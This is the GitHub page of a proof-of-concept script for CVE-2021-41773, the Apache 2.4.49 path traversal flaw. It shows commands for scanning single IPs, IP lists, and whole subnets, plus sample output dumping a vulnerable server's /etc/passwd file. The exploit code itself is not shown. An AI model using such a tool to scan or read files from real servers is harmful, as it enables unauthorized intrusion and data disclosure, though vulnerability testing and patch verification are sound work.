Skip to content

chrootid/CVE-2021-41773-PoC

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

CVE-2021-41773

Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49

This script test Apache HTTP Server 2.4.49

Usage:

CVE-2021-41773.py options

  • Only for one IP: python CVE-2021-41773.py IP_address
  • Option -f For IP list in file Example: python CVE-2021-41773.py -f IP_address_list_filename
  • Option -s For IP subnet Example: python CVE-2021-41773.py -s 192.168.1.0/24

Output

python CVE-2021-41773.py AAA.BBB.CCC.DDD
Server AAA.BBB.CCC.DDD IS VULNERABLE
The output is:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin
systemd-network:x:998:997:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mysql:x:997:995:MySQL server:/var/lib/mysql:/sbin/nologin
saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:995:993:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
darkerc:x:1000:1000::/home/darkerc:/sbin/nologin
toranon:x:986:983:Tor anonymizing user:/var/lib/tor:/sbin/nologin
nginx:x:985:982:nginx user:/var/cache/nginx:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%